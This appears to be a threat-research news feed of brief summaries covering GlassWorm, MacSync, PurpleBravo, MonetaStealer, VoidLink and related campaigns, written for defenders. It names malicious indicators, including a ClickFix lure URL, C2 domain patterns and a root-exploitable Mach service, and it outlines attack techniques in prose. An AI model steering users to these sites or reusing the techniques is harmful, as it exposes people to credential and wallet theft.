Socket researchers identified a developer-account compromise in the Open VSX Registry that published malicious updates to four oorzc extensions embedding the GlassWorm loader, using staged AES-encrypted loaders and Solana transaction memos as a dynamic dead drop. The macOS-focused follow-on payload steals browser cookies, wallet files, keychain, AWS and SSH credentials and establishes persistence via a LaunchAgent; remove affected extensions, check for persistence, and rotate exposed tokens and keys. #GlassWorm #OpenVSX
Tag: MACOS
Downloading cracks, keygens, or cheat tools can deliver malware or embed critical vulnerabilities into systems, as shown by examples like iOS jailbreaks, Windows cheat drivers, and the macOS AutoHackGUI helper that runs as root. Researchers reversed AutoHackGUI and demonstrated an XPC-based exploit that connects to the Mach service io.github.marlkiller.AutoHackGUIHelper to execute arbitrary commands as root, illustrating how non-malicious cracking tools can enable local privilege escalation. #AutoHackGUI #IDAPro
Meta is rolling out “Strict Account Settings” on WhatsApp to provide lockdown-style protections for journalists, public figures, and other high-risk users against sophisticated threats like spyware and zero-click exploits. The opt-in feature applies extreme controls from a user’s primary device—enabling two-step verification, blocking unknown media and calls, disabling link previews, and locking profile and presence data—as WhatsApp also migrates parts of its codebase to Rust for added resilience. #WhatsApp #NSOGroup
Elastic’s Infosec team reduced endpoint event volume and costs by using Event Filtering and Advanced Policy Settings in Elastic Defend across their worldwide distributed workforce. By identifying noisy processes and hosts with ES|QL queries, applying event filters, disabling unnecessary hash calculations, and enabling event aggregation they cut event volume per host by ~75% and saved terabytes of storage per month. #ElasticDefend #Elastic
![Threat Research | Weekly Recap [25 Jan 2026]](https://www.hendryadrian.com/tweet/image/WeeklyRecap.png "Threat Research | Weekly Recap [25 Jan 2026]")
Cybersecurity Threat Research ‘Weekly’ Recap: the report highlights AI‑generated malware frameworks like VoidLink, AI‑driven KONNI backdoors, real‑time LLM‑assembled phishing, and evolving ransomware such as AnubisRaaS and Osiris, alongside supply‑chain and watering‑hole compromises across multiple industries. It also covers state‑sponsored espionage, credential theft campaigns, and defensive insights for detection, telemetry, and incident response. #VoidLink #KONNI #AnubisRaaS #Osiris #CharmingKitten #APT28 #PurpleBravo #Evelyn
Recorded Future / Insikt Group documents PurpleBravo, a North Korean-linked campaign that uses fraudulent developer/recruiter personas and malicious GitHub repositories to deliver infostealers and multi-platform RATs (BeaverTail, GolangGhost/PylangGhost, InvisibleFerret) targeting software developers—especially in the cryptocurrency sector and South Asia. The report details obfuscated JavaScript (Base64 + XOR), RC4/MD5 C2 protocols, registry Run-key persistence, Chrome credential-theft techniques (including DPAPI and app-bound bypasses), extensive C2 infrastructure (dozens of IPs and Astrill VPN nodes), and overlap with PurpleDelta activity. #PurpleBravo #BeaverTail
Researchers discovered a ClickFix-style macOS lure (macclouddrive.com/s2) that tricks users into pasting a Terminal one-liner which downloads a daemonized Zsh stager that executes a remote AppleScript to harvest browser credentials, Keychain data, crypto wallets, and other sensitive files. The campaign uses the MacSync infostealer with rotating jmpbowl.* C2 domains and conditionally trojanizes Electron wallet apps (Ledger Wallet.app, Trezor Suite.app) to capture PINs and recovery phrases for long-term phishing. #MacSync #jmpbowl
LastPass warns users about a new phishing campaign impersonating their service to steal master passwords. The attack involves fake emails claiming maintenance, directing users to malicious sites. #LastPass #PhishingCampaign…
North Korean threat actors have advanced their hacking tactics by exploiting malicious Visual Studio Code projects to deliver backdoors and malicious payloads. This campaign uses sophisticated multi-stage techniques, including obfuscated JavaScript and task configuration files, to compromise target systems and maintain persistence. #NorthKorea #VisualStudioCode #Backdoor #Vercel #DPRK…
A new Python-based info stealer called SolyxImmortal employs legitimate APIs and third-party libraries to stealthily harvest and exfiltrate data on Windows systems. It features comprehensive surveillance capabilities and is linked to a Turkish-speaking threat actor, highlighting the ongoing threat of opportunistic malware campaigns. #SolyxImmortal #Cyfirma…
This article explains the importance of managing and deleting saved passwords in Google Chrome to enhance digital security. It highlights the risks of browser-based password storage and provides step-by-step guides for removing passwords across devices. #GooglePasswordManager #BrowserSecurity…
Cybersecurity Threat Research ‘Weekly’ Recap. The report highlights a surge in encryptionless extortion and the rise of new RaaS groups such as Qilin, Akira, and LockBit 5.0, tracks the December 2025 ransomware activity, surveys infostealers, phishing campaigns, RATs and loaders, and web skimming, notes notable vulnerabilities like MongoBleed (CVE-2025-14847), CVE-2020-8554 and CVE-2017-11882, and points to defense tools such as Landlock telemetry and AuraInspector along with AI/LLM attack surface insights and Validin’s research. #Qilin #Akira #LockBit5_0 #Sicarii #CrazyHunter #Medusa #Remcos #AsyncRAT #CastleLoader #VoidLink #KONGTUKE #LOTUSLITE #AshTag #AshenLepus #RustDesk #Winos4_0 #RedVDS #Magecart #SilentPush #MongoBleed #CVE2025_14847 #CVE2020_8554 #CVE2017_11882 #SolyxImmortal #ACRStealer #LummaC2 #Stealc #MonetaStealer #MEXCApiAutomator #MustangPanda
A new Linux malware framework called VoidLink has been identified, designed with a modular structure focused on infiltrating cloud environments and Linux systems. Its sophisticated features suggest it may be geared toward espionage or supply-chain attacks targeting software engineers. #VoidLink #LinuxMalware #CloudSecurity #CobaltStrike…
Iru researchers uncovered a Mach-O binary named Portfolio_Review.exe that masquerades as a Windows .exe and contains a PyInstaller CArchive bundling a portfolio_app.pyc payload researchers named MonetaStealer. MonetaStealer—still in early development and relying heavily on AI code—targets Chrome credentials/cookies/history, crypto wallets, macOS Keychain and Wi‑Fi credentials, stages data to STOLEN{sessionID}.zip and uses api.telegram.org for reporting while remaining undetected on VirusTotal. #MonetaStealer #Iru
This roundup highlights recent cybersecurity incidents including AI data violations, cyberattacks on Jaguar Land Rover, and the arrest related to the Desjardins data breach. It also discusses Chinese cyber activities against Taiwan and US congressional email hacks. #genAI #JaguarLandRover #Desjardins #SaltTyphoon #OwnCloud…